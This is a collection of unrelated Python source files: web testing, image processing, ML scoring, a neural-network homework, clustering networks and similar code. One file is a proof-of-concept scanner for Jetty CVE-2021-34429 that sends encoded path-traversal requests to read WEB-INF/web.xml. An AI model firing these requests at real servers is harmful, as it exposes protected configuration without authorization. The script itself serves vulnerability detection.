self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
multiple_form = res.forms["multiple_select_form"]
self.assertEqual(multiple_form["multiple"].value, ["Nine", "Eleven"])
multiple_form.set("multiple", ["Nine", "Ten"])
self.assertEqual(multiple_form["multiple"].value, ["Nine", "Ten"])
display = multiple_form.submit("button")
self.assertIn("<p>You selected Nine, Ten</p>", display, display)
def test_multiple_select_reset_value(self):
app = webtest.TestApp(select_app_without_values)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
multiple_form = res.forms["multiple_select_form"]
self.assertEqual(multiple_form["multiple"].value, ["Nine", "Eleven"])
# reset with value
multiple_form["multiple"].value = []
self.assertIsNone(multiple_form["multiple"].value)
# re-set a value
multiple_form["multiple"].value = ['Nine']
assert multiple_form["multiple"].value == ['Nine']
# reset with force_value
multiple_form["multiple"].force_value(None)
self.assertIsNone(multiple_form["multiple"].value)
display = multiple_form.submit("button")
self.assertIn("<p>You selected </p>", display, display)
class SingleUploadFileApp:
body = b"""
<html>
<head><title>form page</title></head>
<body>
<form method="POST" id="file_upload_form"
enctype="multipart/form-data">
<input name="file-field" type="file" value="some/path/file.txt" />
<input name="int-field" type="text" value="" />
<input name="button" type="submit" value="single">
</form>
</body>
</html>
"""
def __call__(self, environ, start_response):
req = Request(environ)
status = b"200 OK"
if req.method == "GET":
body = self.body
else:
body = b"""
<html>
<head><title>display page</title></head>
<body>
""" + self.get_files_page(req) + b"""
</body>
</html>
"""
headers = [
('Content-Type', 'text/html; charset=utf-8'),
('Content-Length', str(len(body)))]
# PEP 3333 requires native strings:
headers = [(str(k), str(v)) for k, v in headers]
start_response(status, headers)
assert(isinstance(body, bytes))
return [body]
def get_files_page(self, req):
file_parts = []
uploaded_files = [(k, v) for k, v in req.POST.items() if 'file' in k]
uploaded_files = sorted(uploaded_files)
for name, uploaded_file in uploaded_files:
if isinstance(uploaded_file, cgi.FieldStorage):
filename = to_bytes(uploaded_file.filename)
value = to_bytes(uploaded_file.value, 'ascii')
content_type = to_bytes(uploaded_file.type, 'ascii')
else:
filename = value = content_type = b''
file_parts.append(b"""
<p>You selected '""" + filename + b"""'</p>
<p>with contents: '""" + value + b"""'</p>
<p>with content type: '""" + content_type + b"""'</p>
""")
return b''.join(file_parts)
class UploadBinaryApp(SingleUploadFileApp):
def get_files_page(self, req):
uploaded_files = [(k, v) for k, v in req.POST.items() if 'file' in k]
data = uploaded_files[0][1].value
data = struct.unpack(b'255h', data[:510])
return b','.join([to_bytes(str(i)) for i in data])
class MultipleUploadFileApp(SingleUploadFileApp):
body = b"""
<html>
<head><title>form page</title></head>
<body>
<form method="POST" id="file_upload_form"
enctype="multipart/form-data">
<input name="file-field-1" type="file" />
<input name="file-field-2" type="file" />
<input name="button" type="submit" value="single">
</form>
</body>
</html>
"""
class TestFileUpload(unittest.TestCase):
def assertFile(self, name, contents, display, content_type=None):
if isinstance(name, bytes):
text_name = name.decode('ascii')
else:
text_name = name
self.assertIn("<p>You selected '" + text_name + "'</p>",
display, display)
if isinstance(contents, bytes):
text_contents = contents.decode('ascii')
else:
text_contents = contents
self.assertIn("<p>with contents: '" + text_contents + "'</p>",
display, display)
if content_type:
self.assertIn("<p>with content type: '" + content_type + "'</p>",
display, display)
def test_no_uploads_error(self):
app = webtest.TestApp(SingleUploadFileApp())
app.get('/').forms["file_upload_form"].upload_fields()
def test_upload_without_file(self):
app = webtest.TestApp(SingleUploadFileApp())
upload_form = app.get('/').forms["file_upload_form"]
upload_form.submit()
def test_file_upload_with_filename_only(self):
uploaded_file_name = os.path.join(os.path.dirname(__file__),
"__init__.py")
uploaded_file_contents = open(uploaded_file_name).read()
uploaded_file_contents = to_bytes(uploaded_file_contents)
app = webtest.TestApp(SingleUploadFileApp())
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
self.assertEqual(res.charset, 'utf-8')
single_form = res.forms["file_upload_form"]
single_form.set("file-field", (uploaded_file_name,))
display = single_form.submit("button")
self.assertFile(uploaded_file_name, uploaded_file_contents, display)
def test_file_upload_with_filename_and_contents(self):
uploaded_file_name = os.path.join(os.path.dirname(__file__),
"__init__.py")
uploaded_file_contents = open(uploaded_file_name).read()
uploaded_file_contents = to_bytes(uploaded_file_contents)
app = webtest.TestApp(SingleUploadFileApp())
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
single_form = res.forms["file_upload_form"]
single_form.set("file-field",
(uploaded_file_name, uploaded_file_contents))
display = single_form.submit("button")
self.assertFile(uploaded_file_name, uploaded_file_contents, display)
def test_file_upload_with_content_type(self):
uploaded_file_name = os.path.join(os.path.dirname(__file__),
"__init__.py")
with open(uploaded_file_name, 'rb') as f:
uploaded_file_contents = f.read()
app = webtest.TestApp(SingleUploadFileApp())
res = app.get('/')
single_form = res.forms["file_upload_form"]
single_form["file-field"].value = Upload(uploaded_file_name,
uploaded_file_contents,
'text/x-custom-type')
display = single_form.submit("button")
self.assertFile(uploaded_file_name, uploaded_file_contents, display,
content_type='text/x-custom-type')
def test_file_upload_binary(self):
binary_data = struct.pack('255h', *range(0, 255))
app = webtest.TestApp(UploadBinaryApp())
res = app.get('/')
single_form = res.forms["file_upload_form"]
single_form.set("file-field", ('my_file.dat', binary_data))
display = single_form.submit("button")
self.assertIn(','.join([str(n) for n in range(0, 255)]), display)
def test_multiple_file_uploads_with_filename_and_contents(self):
uploaded_file1_name = os.path.join(os.path.dirname(__file__),
"__init__.py")
uploaded_file1_contents = open(uploaded_file1_name).read()
uploaded_file1_contents = to_bytes(uploaded_file1_contents)
uploaded_file2_name = __file__
uploaded_file2_name = os.path.join(os.path.dirname(__file__), 'html',
"404.html")
uploaded_file2_contents = open(uploaded_file2_name).read()
uploaded_file2_contents = to_bytes(uploaded_file2_contents)
app = webtest.TestApp(MultipleUploadFileApp())
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
single_form = res.forms["file_upload_form"]
single_form.set("file-field-1",
(uploaded_file1_name, uploaded_file1_contents))
single_form.set("file-field-2",
(uploaded_file2_name, uploaded_file2_contents))
display = single_form.submit("button")
self.assertFile(uploaded_file1_name, uploaded_file1_contents, display)
self.assertFile(uploaded_file1_name, uploaded_file1_contents, display)
def test_post_int(self):
binary_data = struct.pack('255h', *range(0, 255))
app = webtest.TestApp(SingleUploadFileApp())
res = app.get('/')
single_form = res.forms["file_upload_form"]
single_form.set("file-field", ('my_file.dat', binary_data))
single_form.set("int-field", 100)
# just check it does not raise
single_form.submit("button")
def test_invalid_types(self):
binary_data = struct.pack('255h', *range(0, 255))
app = webtest.TestApp(SingleUploadFileApp())
res = app.get('/')
single_form = res.forms["file_upload_form"]
single_form.set("file-field", ('my_file.dat', binary_data))
single_form.set("int-field", SingleUploadFileApp())
self.assertRaises(ValueError, single_form.submit, "button")
def test_upload_invalid_content(self):
app = webtest.TestApp(SingleUploadFileApp())
res = app.get('/')
single_form = res.forms["file_upload_form"]
single_form.set("file-field", ('my_file.dat', 1))
try:
single_form.submit("button")
except ValueError:
e = sys.exc_info()[1]
self.assertEquals(
str(e),
u('File content must be %s not %s' % (bytes, int))
)
def test_invalid_uploadfiles(self):
app = webtest.TestApp(SingleUploadFileApp())
self.assertRaises(ValueError, app.post, '/', upload_files=[()])
self.assertRaises(
ValueError,
app.post, '/',
upload_files=[('name', 'filename', 'content', 'extra')]
)
def test_goto_upload_files(self):
app = webtest.TestApp(SingleUploadFileApp())
resp = app.get('/')
resp = resp.goto(
'/',
method='post',
upload_files=[('file', 'filename', b'content')]
)
resp.mustcontain("<p>You selected 'filename'</p>",
"<p>with contents: 'content'</p>")
def test_post_upload_files(self):
app = webtest.TestApp(SingleUploadFileApp())
resp = app.post(
'/',
upload_files=[('file', 'filename', b'content')]
)
resp.mustcontain("<p>You selected 'filename'</p>",
"<p>with contents: 'content'</p>")
def test_post_upload_empty_files(self):
app = webtest.TestApp(SingleUploadFileApp())
resp = app.post(
'/',
upload_files=[('file', 'filename', b'')]
)
resp.mustcontain("<p>You selected 'filename'</p>",
"<p>with contents: ''</p>")
resp = app.get('/')
form = resp.form
form['file-field'] = Upload('filename', b'', 'text/plain')
resp = form.submit()
resp.mustcontain("<p>You selected 'filename'</p>",
"<p>with contents: ''</p>")
|
regtests/test-all.py | ahakingdom/Rusthon | 622 | 12770760 | <filename>regtests/test-all.py
import os, subprocess
os.chdir( os.path.split(__file__)[0] )
subprocess.check_call(['python', 'test-c++.py'])
subprocess.check_call(['python', 'test-go.py'])
subprocess.check_call(['python', 'test-javascript.py'])
subprocess.check_call(['python', 'test-markdowns.py'])
|
rastervision_core/rastervision/core/utils/misc.py | theoway/raster-vision | 1,577 | 12770766 | <reponame>theoway/raster-vision
import io
from pydantic import confloat
from PIL import Image
import numpy as np
import imageio
import logging
Proportion = confloat(ge=0, le=1)
log = logging.getLogger(__name__)
def save_img(im_array, output_path):
imageio.imwrite(output_path, im_array)
def numpy_to_png(array: np.ndarray) -> str:
"""Get a PNG string from a Numpy array.
Args:
array: A Numpy array of shape (w, h, 3) or (w, h), where the
former is meant to become a three-channel image and the
latter a one-channel image. The dtype of the array
should be uint8.
Returns:
str
"""
im = Image.fromarray(array)
output = io.BytesIO()
im.save(output, 'png')
return output.getvalue()
def png_to_numpy(png: str, dtype=np.uint8) -> np.ndarray:
"""Get a Numpy array from a PNG string.
Args:
png: A str containing a PNG-formatted image.
Returns:
numpy.ndarray
"""
incoming = io.BytesIO(png)
im = Image.open(incoming)
return np.array(im)
|
python-sdk/experimental/deploy-triton/src/score_densenet.py | 0mza987/azureml-examples | 331 | 12770767 | <gh_stars>100-1000
import io
import numpy as np
import os
from azureml.core import Model
from azureml.contrib.services.aml_request import rawhttp
from azureml.contrib.services.aml_response import AMLResponse
from PIL import Image
from onnxruntimetriton import InferenceSession
def preprocess(img, scaling): # , dtype):
"""Pre-process an image to meet the size, type and format
requirements specified by the parameters.
"""
c = 3
h = 224
w = 224
format = "FORMAT_NCHW"
if c == 1:
sample_img = img.convert("L")
else:
sample_img = img.convert("RGB")
resized_img = sample_img.resize((w, h), Image.BILINEAR)
resized = np.array(resized_img)
if resized.ndim == 2:
resized = resized[:, :, np.newaxis]
# npdtype = triton_to_np_dtype(dtype)
typed = resized.astype(np.float32)
# typed = resized
if scaling == "INCEPTION":
scaled = (typed / 128) - 1
elif scaling == "VGG":
if c == 1:
scaled = typed - np.asarray((128,), dtype=npdtype)
else:
scaled = typed - np.asarray((123, 117, 104), dtype=npdtype)
else:
scaled = typed
# Swap to CHW if necessary
if format == "FORMAT_NCHW":
ordered = np.transpose(scaled, (2, 0, 1))
else:
ordered = scaled
# Channels are in RGB order. Currently model configuration data
# doesn't provide any information as to other channel orderings
# (like BGR) so we just assume RGB.
return ordered
def postprocess(output_array):
"""Post-process results to show the predicted label."""
output_array = output_array[0]
max_label = np.argmax(output_array)
final_label = label_dict[max_label]
return f"{max_label} : {final_label}"
def init():
global session, label_dict
session = InferenceSession(path_or_bytes="densenet_onnx")
model_dir = os.path.join(os.environ["AZUREML_MODEL_DIR"], "models")
folder_path = os.path.join(model_dir, "triton", "densenet_onnx")
label_path = os.path.join(
model_dir, "triton", "densenet_onnx", "densenet_labels.txt"
)
label_file = open(label_path, "r")
labels = label_file.read().split("\n")
label_dict = dict(enumerate(labels))
@rawhttp
async def run(request):
"""This function is called every time your webservice receives a request.
Notice you need to know the names and data types of the model inputs and
outputs. You can get these values by reading the model configuration file
or by querying the model metadata endpoint.
"""
if request.method == "POST":
outputs = []
for output in session.get_outputs():
outputs.append(output.name)
input_name = session.get_inputs()[0].name
reqBody = await request.get_data()
img = Image.open(io.BytesIO(reqBody))
image_data = preprocess(img, scaling="INCEPTION")
res = session.run(outputs, {input_name: image_data})
result = postprocess(output_array=res)
return AMLResponse(result, 200)
else:
return AMLResponse("bad request", 500)
|
resource_tracker/migrations/0005_auto_20211015_1015.py | LaudateCorpus1/squest | 112 | 12770793 | # Generated by Django 3.2.7 on 2021-10-15 08:15
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('resource_tracker', '0004_alter_resourcepoolattributedefinition_resource_pool'),
]
operations = [
migrations.RenameField(
model_name='resourcegroupattributedefinition',
old_name='resource_group_definition',
new_name='resource_group',
),
migrations.RenameField(
model_name='resourcegrouptextattributedefinition',
old_name='resource_group_definition',
new_name='resource_group',
),
migrations.AlterUniqueTogether(
name='resourcegroupattributedefinition',
unique_together={('name', 'resource_group')},
),
migrations.AlterUniqueTogether(
name='resourcegrouptextattributedefinition',
unique_together={('name', 'resource_group')},
),
]
|
src/main/python/systemds/operator/algorithm/builtin/shortestPath.py | mdbloice/systemds | 372 | 12770804 | <reponame>mdbloice/systemds
# -------------------------------------------------------------
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# -------------------------------------------------------------
# Autogenerated By : src/main/python/generator/generator.py
# Autogenerated From : scripts/builtin/shortestPath.dml
from typing import Dict, Iterable
from systemds.operator import OperationNode, Matrix, Frame, List, MultiReturn, Scalar
from systemds.script_building.dag import OutputType
from systemds.utils.consts import VALID_INPUT_TYPES
def shortestPath(G: Matrix,
sourceNode: int,
**kwargs: Dict[str, VALID_INPUT_TYPES]):
"""
:param The: G can be 0/1 (just specifying whether the nodes
:param are: not) or integer values (representing the weight
:param of: or the distances between nodes, 0 if not connected).
:param maxi: Integer max number of iterations accepted (0 for FALSE, i.e.
:param max: iterations not defined)
:param sourceNode: index to calculate the shortest paths to all other nodes.
:param verbose: flag for verbose debug output
:return: 'OperationNode' containing minimum distance shortest-path from vertex i to vertex j. & of the minimum distance is infinity, the two nodes are
"""
params_dict = {'G': G, 'sourceNode': sourceNode}
params_dict.update(kwargs)
return Matrix(G.sds_context,
'shortestPath',
named_input_nodes=params_dict)
|
algorithms/math/modular_exponentiation.py | jainrocky/python-ds | 1,723 | 12770811 | # to compute modular power
# Iterative Function to calculate
# (x^y)%p in O(log y)
def power(x, y, p) :
res = 1 # Initialize result
# Update x if it is more
# than or equal to p
x = x % p
while (y > 0) :
# If y is odd, multiply
# x with result
if ((y & 1) == 1) :
res = (res * x) % p
# y must be even now
y = y >> 1 # y = y/2
x = (x * x) % p
return res |
asset/api.py | 745184532/cmdb | 251 | 12770820 | from rest_framework import generics
from .models import AssetInfo
from .serializers import AssetSerializer
from rest_framework import permissions
class AssetList(generics.ListCreateAPIView):
queryset = AssetInfo.objects.all()
serializer_class = AssetSerializer
permission_classes = (permissions.AllowAny,)
class AssetDetail(generics.RetrieveUpdateDestroyAPIView):
queryset = AssetInfo.objects.all()
serializer_class = AssetSerializer
permission_classes = (permissions.AllowAny,)
|
data_collection/gazette/spiders/sc_pescaria_brava.py | kaiocp/querido-diario | 454 | 12770827 | from gazette.spiders.base.fecam import FecamGazetteSpider
class ScPescariaBravaSpider(FecamGazetteSpider):
name = "sc_pescaria_brava"
FECAM_QUERY = 'entidade:"Prefeitura Municipal de Pescaria Brava"'
TERRITORY_ID = "4212650"
|
2021/CVE-2021-34429/poc/pocsploit/CVE-2021-34429.py | hjyuan/reapoc | 421 | 12770845 | <reponame>hjyuan/reapoc
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Jetty Authorization Before Parsing and Canonicalization Variation''',
"description": '''For Eclipse Jetty versions 9.4.37-9.4.42, 10.0.1-10.0.5 & 11.0.1-11.0.5, URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5.''',
"severity": "medium",
"references": [
"https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"cvss-score": "",
"cve-id": "CVE-2021-34429",
"cwe-id": "CWE-200"
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2021", "jetty"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/%u002e/WEB-INF/web.xml"""
method = "GET"
data = """"""
headers = {}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/.%00/WEB-INF/web.xml"""
method = "GET"
data = """"""
headers = {}
resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (resp1.status_code == 200) and ("""</web-app>""" in resp1.text and """java.sun.com""" in resp1.text) and ("""application/xml""" in str(resp1.headers)):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url |
assignment1/q2_neural.py | gyubokLee/CS224 | 125 | 12770851 | <reponame>gyubokLee/CS224
import numpy as np
import random
from q1_softmax import softmax
from q2_sigmoid import sigmoid, sigmoid_grad
from q2_gradcheck import gradcheck_naive
def affine_forward(x, w, b):
"""
Computes the forward pass for an affine (fully-connected) layer.
The input x has shape (N, d_1, ..., d_k) and contains a minibatch of N
examples, where each example x[i] has shape (d_1, ..., d_k). We will
reshape each input into a vector of dimension D = d_1 * ... * d_k, and
then transform it to an output vector of dimension M.
Inputs:
- x: A numpy array containing input data, of shape (N, d_1, ..., d_k)
- w: A numpy array of weights, of shape (D, M)
- b: A numpy array of biases, of shape (M,)
Returns a tuple of:
- out: output, of shape (N, M)
- cache: (x, w, b)
"""
out = None
N = x.shape[0]
D = np.prod(x.shape[1:])
M = b.shape[1]
out = np.dot(x.reshape(N, D), w.reshape(D, M)) + b.reshape(1, M)
return out, (x,w,b)
def affine_backward(dout, cache):
"""
Computes the backward pass for an affine layer.
Inputs:
- dout: Upstream derivative, of shape (N, M)
- cache: Tuple of:
- x: Input data, of shape (N, d_1, ... d_k)
- w: Weights, of shape (D, M)
Returns a tuple of:
- dx: Gradient with respect to x, of shape (N, d1, ..., d_k)
- dw: Gradient with respect to w, of shape (D, M)
- db: Gradient with respect to b, of shape (M,)
"""
x, w, b = cache
dx, dw, db = None, None, None
N = x.shape[0]
D = np.prod(x.shape[1:])
M = b.shape[1]
dx = np.dot(dout, w.reshape(D, M).T).reshape(x.shape)
dw = np.dot(x.reshape(N, D).T, dout).reshape(w.shape)
db = np.sum(dout, axis=0)
return dx, dw, db
def sigmoid_forward(x):
"""
Computes the forward pass for a sigmoid activation.
Inputs:
- x: Input data, numpy array of arbitary shape;
Returns a tuple (out, cache)
- out: output of the same shape as x
- cache: identical to out; required for backpropagation
"""
return sigmoid(x), sigmoid(x)
def sigmoid_backward(dout, cache):
"""
Computes the backward pass for an sigmoid layer.
Inputs:
- dout: Upstream derivative, same shape as the input
to the sigmoid layer (x)
- cache: sigmoid(x)
Returns a tuple of:
- dx: back propagated gradient with respect to x
"""
x = cache
return sigmoid_grad(x) * dout
def forward_backward_prop(data, labels, params, dimensions):
"""
Forward and backward propagation for a two-layer sigmoidal network
Compute the forward propagation and for the cross entropy cost,
and backward propagation for the gradients for all parameters.
"""
### Unpack network parameters (do not modify)
ofs = 0
Dx, H, Dy = (dimensions[0], dimensions[1], dimensions[2])
N = data.shape[0]
W1 = np.reshape(params[ofs:ofs+ Dx * H], (Dx, H))
ofs += Dx * H
b1 = np.reshape(params[ofs:ofs + H], (1, H))
ofs += H
W2 = np.reshape(params[ofs:ofs + H * Dy], (H, Dy))
ofs += H * Dy
b2 = np.reshape(params[ofs:ofs + Dy], (1, Dy))
### YOUR CODE HERE: forward propagation
hidden = np.dot(data,W1) + b1
layer1_a = sigmoid(hidden)
layer2 = np.dot(layer1_a, W2) + b2
# need to calculate the softmax loss
probs = softmax(layer2)
cost = - np.sum(np.log(probs[np.arange(N), np.argmax(labels, axis=1)]))
### END YOUR CODE
### YOUR CODE HERE: backward propagation
#There is no regularization :/
# dx -> sigmoid -> W2 * layer1_a + b -> sigmoid -> W1 * data + b1 -> ..
dx = probs.copy()
dx -= labels
dlayer2 = np.zeros_like(dx)
gradW2 = np.zeros_like(W2)
gradW1 = np.zeros_like(W1)
gradb2 = np.zeros_like(b2)
gradb1 = np.zeros_like(b1)
gradW2 = np.dot(layer1_a.T, dx)
gradb2 = np.sum(dx, axis=0)
dlayer2 = np.dot(dx, W2.T)
dlayer1 = sigmoid_grad(layer1_a) * dlayer2
gradW1 = np.dot(data.T, dlayer1)
gradb1 = np.sum(dlayer1, axis=0)
# Decided to implement affine (forward and backward function)
# sigmoid (forward and backward function)
# These should work properly;
# scores, cache_1 = affine_forward(data, W1, b1)
# scores, cache_s1 = sigmoid_forward(scores)
# scores, cache_2 = affine_forward(scores, W2, b2)
# # need to calculate the softmax loss
# probs = softmax(scores)
# cost = -np.sum(np.log(probs[np.arange(N), np.argmax(labels)] + 1e-12)) / N
# softmax_dx = probs.copy()
# softmax_dx[np.arange(N), np.argmax(labels,axis=1)] -= 1
# softmax_dx /= N
# grads = {}
# dlayer2, grads['W2'], grads['b2'] = affine_backward(softmax_dx, cache_2)
# dlayer1s = sigmoid_backward(dlayer2, cache_s1)
# dlayer1, grads['W1'], grads['b1'] = affine_backward(dlayer1s, cache_1)
#softmax_dx is the gradient of the loss w.r.t. y_{est}
### END YOUR CODE
### Stack gradients (do not modify)
grad = np.concatenate((gradW1.flatten(), gradb1.flatten(),
gradW2.flatten(), gradb2.flatten()))
return cost, grad
def sanity_check():
"""
Set up fake data and parameters for the neural network, and test using
gradcheck.
"""
print("Running sanity check...")
N = 300
dimensions = [10, 5, 10]
data = np.random.randn(N, dimensions[0]) # each row will be a datum
labels = np.zeros((N, dimensions[2]))
for i in range(N):
labels[i,random.randint(0,dimensions[2]-1)] = 1
params = np.random.randn((dimensions[0] + 1) * dimensions[1] + (
dimensions[1] + 1) * dimensions[2], )
#cost, _ = forward_backward_prop(data, labels, params, dimensions)
# # expect to get 1 in 10 correct
#print(np.exp(-cost))
# #cost is roughly correct
gradcheck_naive(lambda params: forward_backward_prop(data, labels, params,
dimensions), params)
def your_sanity_checks():
"""
Use this space add any additional sanity checks by running:
python q2_neural.py
This function will not be called by the autograder, nor will
your additional tests be graded.
"""
print("Running your sanity checks...")
### YOUR CODE HERE
#raise NotImplementedError
### END YOUR CODE
if __name__ == "__main__":
sanity_check()
your_sanity_checks()
|
ch22-直方图/hist-normalized-numpy-2.py | makelove/OpenCV-Python-Tutorial | 2,875 | 12770889 | <filename>ch22-直方图/hist-normalized-numpy-2.py
# -*-coding:utf8-*-#
__author__ = 'play4fun'
"""
create time:15-10-24 下午5:26
"""
import cv2
import numpy as np
from matplotlib import pyplot as plt
img = cv2.imread('../data/contrast75.png', 0)
# flatten() 将数组变成一维
hist, bins = np.histogram(img.flatten(), 256, [0, 256])
# 计算累积分布图
cdf = hist.cumsum()
##
# 构建 Numpy 掩模数组 cdf 为原数组 当数组元素为 0 时 掩盖(计算时被忽略
cdf_m = np.ma.masked_equal(cdf, 0)
cdf_m = (cdf_m - cdf_m.min()) * 255 / (cdf_m.max() - cdf_m.min())
# 对被掩盖的元素赋值,赋值为 0
cdf = np.ma.filled(cdf_m, 0).astype('uint8')
img2 = cdf[img]
# cv2.imshow("img2",img2)
# cv2.waitKey(0)
##
# flatten() 将数组变成一维
hist, bins = np.histogram(img2.flatten(), 256, [0, 256])
# 计算累积分布图
cdf = hist.cumsum()
cdf_normalized = cdf * hist.max() / cdf.max()
plt.plot(cdf_normalized, color='b')
plt.hist(img.flatten(), 256, [0, 256], color='r')
plt.xlim([0, 256])
plt.legend(('cdf', 'histogram'), loc='upper left')
plt.show()
'''
直方图均 化经常用来使所有的图片具有相同的亮度条件的参考 工具。 在很多情况下 很有用。例如 脸 别 在 练分类器前 练 的所有图片 先 直方图均 化从而使它们 到相同的亮度条件。
''' |
pyclustering/nnet/__init__.py | JosephChataignon/pyclustering | 1,013 | 12770963 | <reponame>JosephChataignon/pyclustering<gh_stars>1000+
"""!
@brief Neural and oscillatory network module. Consists of models of bio-inspired networks.
@authors <NAME> (<EMAIL>)
@date 2014-2020
@copyright BSD-3-Clause
"""
import math
from enum import IntEnum
class initial_type(IntEnum):
"""!
@brief Enumerator of types of oscillator output initialization.
"""
## Output of oscillators are random in line with gaussian distribution.
RANDOM_GAUSSIAN = 0
## Output of oscillators are equidistant from each other (uniformly distributed, not randomly).
EQUIPARTITION = 1
class solve_type(IntEnum):
"""!
@brief Enumerator of solver types that are used for network simulation.
"""
## Forward Euler first-order method.
FAST = 0 # Usual calculation: x(k + 1) = x(k) + f(x(k)).
## Classic fourth-order Runge-Kutta method (fixed step).
RK4 = 1
## Runge-Kutta-Fehlberg method with order 4 and 5 (float step)."
RKF45 = 2
class conn_type(IntEnum):
"""!
@brief Enumerator of connection types between oscillators.
"""
## No connection between oscillators.
NONE = 0
## All oscillators have connection with each other.
ALL_TO_ALL = 1
## Connections between oscillators represent grid where one oscillator can be connected with four neighbor oscillators: right, upper, left, lower.
GRID_FOUR = 2
## Connections between oscillators represent grid where one oscillator can be connected with eight neighbor oscillators: right, right-upper, upper, upper-left, left, left-lower, lower, lower-right.
GRID_EIGHT = 3
## Connections between oscillators represent bidirectional list.
LIST_BIDIR = 4
## Connections are defined by user or by network during simulation.
DYNAMIC = 5
class conn_represent(IntEnum):
"""!
@brief Enumerator of internal network connection representation between oscillators.
"""
## Each oscillator has list of his neighbors.
LIST = 0
## Connections are represented my matrix connection NxN, where N is number of oscillators.
MATRIX = 1
class network:
"""!
@brief Common network description that consists of information about oscillators and connection between them.
"""
_num_osc = 0
_osc_conn = None
_conn_represent = None
__conn_type = None
__height = 0
__width = 0
@property
def height(self):
"""!
@brief Height of the network grid (that is defined by amout of oscillators in each column), this value is zero in case of non-grid structure.
@note This property returns valid value only for network with grid structure.
"""
return self.__height
@property
def width(self):
"""!
@brief Width of the network grid, this value is zero in case of non-grid structure.
@note This property returns valid value only for network with grid structure.
"""
return self.__width
@property
def structure(self):
"""!
@brief Type of network structure that is used for connecting oscillators.
"""
return self.__conn_type
def __init__(self, num_osc, type_conn = conn_type.ALL_TO_ALL, conn_repr = conn_represent.MATRIX, height = None, width = None):
"""!
@brief Constructor of the network.
@param[in] num_osc (uint): Number of oscillators in the network that defines size of the network.
@param[in] type_conn (conn_type): Type of connections that are used in the network between oscillators.
@param[in] conn_repr (conn_represent): Type of representation of connections.
@param[in] height (uint): Number of oscillators in column of the network, this argument is used
only for network with grid structure (GRID_FOUR, GRID_EIGHT), for other types this argument is ignored.
@param[in] width (uint): Number of oscillotors in row of the network, this argument is used only
for network with grid structure (GRID_FOUR, GRID_EIGHT), for other types this argument is ignored.
"""
self._num_osc = num_osc
self._conn_represent = conn_repr
self.__conn_type = type_conn
if conn_repr is None:
self._conn_represent = conn_represent.MATRIX
if (type_conn == conn_type.GRID_EIGHT) or (type_conn == conn_type.GRID_FOUR):
if (height is not None) and (width is not None):
self.__height = height
self.__width = width
else:
side_size = self._num_osc ** 0.5
if (side_size - math.floor(side_size) > 0):
raise NameError("Invalid number of oscillators '" + str(num_osc) + "' in the network in case of grid structure (root square should be extractable for the number of oscillators).");
self.__height = int(side_size)
self.__width = self.__height
if self.__height * self.__width != self._num_osc:
raise NameError('Width (' + str(self.__width) + ') x Height (' + str(self.__height) + ') must be equal to Size (' + str(self._num_osc) + ') in case of grid structure');
self._create_structure(type_conn)
def __len__(self):
"""!
@brief Returns size of the network that is defined by amount of oscillators.
"""
return self._num_osc;
def __create_connection(self, index1, index2):
if (self._conn_represent == conn_represent.MATRIX):
self._osc_conn[index1][index2] = True;
else:
self._osc_conn[index1].append(index2);
def __create_all_to_all_connections(self):
"""!
@brief Creates connections between all oscillators.
"""
if (self._conn_represent == conn_represent.MATRIX):
for index in range(0, self._num_osc, 1):
self._osc_conn.append([True] * self._num_osc);
self._osc_conn[index][index] = False;
elif (self._conn_represent == conn_represent.LIST):
for index in range(0, self._num_osc, 1):
self._osc_conn.append([neigh for neigh in range(0, self._num_osc, 1) if index != neigh]);
def __create_grid_four_connections(self):
"""!
@brief Creates network with connections that make up four grid structure.
@details Each oscillator may be connected with four neighbors in line with 'grid' structure: right, upper, left, lower.
"""
side_size = self.__width;
if (self._conn_represent == conn_represent.MATRIX):
self._osc_conn = [[0] * self._num_osc for index in range(0, self._num_osc, 1)];
elif (self._conn_represent == conn_represent.LIST):
self._osc_conn = [[] for index in range(0, self._num_osc, 1)];
else:
raise NameError("Unknown type of representation of connections");
for index in range(0, self._num_osc, 1):
upper_index = index - side_size;
lower_index = index + side_size;
left_index = index - 1;
right_index = index + 1;
node_row_index = math.ceil(index / side_size);
if (upper_index >= 0):
self.__create_connection(index, upper_index);
if (lower_index < self._num_osc):
self.__create_connection(index, lower_index);
